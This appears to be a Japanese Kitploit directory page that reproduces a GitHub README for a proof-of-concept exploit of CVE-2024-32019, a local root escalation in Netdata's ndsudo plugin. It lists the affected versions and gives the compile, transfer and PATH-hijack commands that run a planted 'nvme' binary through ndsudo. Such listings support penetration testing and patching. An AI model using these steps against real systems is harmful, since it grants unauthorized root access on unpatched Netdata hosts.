Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-32019-POC — CVE-2024-32019の概念実証エクスプロイトで、Netdataのndsudoプラグインにおける信頼されない検索パスを介したローカル権限昇格を示します。コンパイル手順とデプロイ手順を含みます。 | Kitploit
ツール/GitHubGitHub/alielkhatteb/cve-2024-32019-poc
特権昇格エクスプロイトペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubalielkhatteb/cve-2024-32019-poc

CVE-2024-32019-POC

CVE-2024-32019の概念実証エクスプロイトで、Netdataのndsudoプラグインにおける信頼されない検索パスを介したローカル権限昇格を示します。コンパイル手順とデプロイ手順を含みます。

リポジトリを見る
5221年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ CVE-2024-32019 - PoC

📌 影響を受けるバージョン

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🛠️ 概念実証

CVE-2024-32019 — ndsudo の信頼されていない検索パスを介したローカル権限昇格

🔧 エクスプロイトのコンパイル

root@kitploit:~
x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 ターゲットマシンへのデプロイ

  1. コンパイルしたバイナリを脆弱なマシンに転送します。

  2. 実行可能にします:

    root@kitploit:~
    chmod +x nvme
    
  3. PATH 操作を介して脆弱なバイナリをエクスプロイトします(バイナリをアップロードした同じパスを使用):

    root@kitploit:~
    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 参考

  • Netdata Security Advisory - GHSA-pmhq-4cxq-wj93

⚖️ 免責事項と利用条件

この概念実証(PoC)コードは、教育および許可された侵入テスト目的のみで提供されます。

  • 許可なしに、このコードを他の目的で修正、再配布、または使用することはできません。
  • 不正使用や改変は違法かつ非倫理的となる可能性があります。
  • 作者は誤用や損害について一切の責任を負いません。
ツールをダウンロード